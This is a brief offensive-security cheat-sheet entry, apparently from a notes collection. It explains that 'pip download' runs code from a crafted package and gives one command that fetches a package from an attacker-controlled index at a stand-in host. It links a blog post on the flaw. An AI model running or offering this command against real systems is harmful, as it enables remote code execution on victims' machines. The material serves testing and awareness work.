# PIP Exploits ## pip download Python pip executes tar files after the download option has been triggered. Therefore, a hand crafted python module needs to be created and build. After that pip can be used in the following way ```sh pip download totally_not_malicious --index-url http://example.com --trusted-host example.com -v ``` An in detail blog post has been done by [wunderwuzzi on embracethered.com](https://embracethered.com/blog/posts/2022/python-package-manager-install-and-download-vulnerability/)